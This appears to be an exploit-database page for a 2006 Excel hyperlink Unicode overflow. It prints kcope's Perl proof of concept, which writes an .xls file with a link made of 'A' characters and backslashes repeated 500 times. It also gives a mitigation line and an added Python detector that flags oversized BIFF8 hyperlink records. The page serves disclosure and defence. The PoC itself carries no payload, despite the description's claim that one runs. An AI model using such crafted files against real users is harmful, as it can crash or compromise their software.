Excel Unicode Overflow
Vendor: N/A
By: kcope
CVSS: 7.5 (HIGH)
CWE: 119
Product Name: N/A
Affected Version From: N/A
Affected Version To: N/A
Patch Exists: No
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
Year: 2006

excelsexywarez.pl

This proof of concept uses Spreadsheet::WriteExcel to create an Excel file containing a hyperlink whose URL is a run of 'A' characters followed by a backslash, repeated 500 times. When the link is clicked, the malicious payload is executed.

Mitigation:

Disable macros in Excel, use a sandbox environment, and use antivirus software.

Exploit-DB raw data:

###############################
# excelsexywarez.pl
# excel unicode overflow poc
# by kcope in 2006
# thanks to revoguard and alex
###############################
use Spreadsheet::WriteExcel;

   my $workbook = Spreadsheet::WriteExcel->new("FUCK.xls");

   $worksheet = $workbook->add_worksheet();

   $format = $workbook->add_format();
   $format->set_bold();
   $format->set_color('red');
   $format->set_align('center');

   $col = $row = 5;
   $worksheet->write($row, $col, "kcope in da house! Click on the link!!!", $format);

   $a="AAAAAAAAAAAAAAAAAAAAAA\\" x 500;
   $worksheet->write_url(0, 0, "$a", "LINK");

# milw0rm.com [2006-06-18]
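
A defensive check for the kind of file the PoC above produces, written for this page as an added example (it is not part of the original exploit or of Spreadsheet::WriteExcel): it walks the BIFF8 records of an already-extracted Workbook stream and reports hyperlink (HLINK) records that are unusually large. Assumptions: the stream has been pulled out of the OLE2 container beforehand, the 4096-byte `limit` is a threshold to tune, and the sample bytes are constructed.

```python
import struct

HLINK = 0x01B8     # BIFF8 hyperlink record
CONTINUE = 0x003C  # carries data that did not fit in the previous record
MAX_RECORD = 8224  # largest data size BIFF8 allows in a single record

def iter_records(stream):
    """Yield (offset, record_id, data) for each record in a workbook stream."""
    pos = 0
    while pos + 4 <= len(stream):
        rec_id, size = struct.unpack_from("<HH", stream, pos)
        data = stream[pos + 4:pos + 4 + size]
        if len(data) < size:
            raise ValueError(f"record at offset {pos} runs past end of stream")
        yield pos, rec_id, data
        pos += 4 + size

def hlink_sizes(stream):
    """Return (offset, total_bytes, breaks_record_limit) for every hyperlink."""
    links, in_hlink = [], False
    for off, rec_id, data in iter_records(stream):
        if rec_id == HLINK:
            links.append([off, len(data), len(data) > MAX_RECORD])
            in_hlink = True
        elif rec_id == CONTINUE and in_hlink:
            links[-1][1] += len(data)  # count continued hyperlink data too
        else:
            in_hlink = False
    return [tuple(link) for link in links]

def suspicious_hlinks(stream, limit=4096):
    """Hyperlinks larger than `limit` bytes (assumed threshold) or over-long."""
    return [l for l in hlink_sizes(stream) if l[1] > limit or l[2]]

def rec(rec_id, data):
    """Build one BIFF record; used only for the constructed sample below."""
    return struct.pack("<HH", rec_id, len(data)) + data

# Constructed sample stream (placeholder bodies, not a real workbook).
SAMPLE = (rec(0x0809, b"\x00" * 16)         # BOF
          + rec(HLINK, b"\x00" * 120)       # ordinary-sized link
          + rec(HLINK, b"A\x00" * 11500)    # 11,500 two-byte characters
          + rec(0x000A, b""))               # EOF

if __name__ == "__main__":
    for off, size, over in suspicious_hlinks(SAMPLE):
        print(f"HLINK at offset {off}: {size} bytes, over record limit: {over}")
```

A hyperlink record that declares more data than a single BIFF8 record may hold is malformed regardless of the threshold, so it is reported even when `limit` is raised.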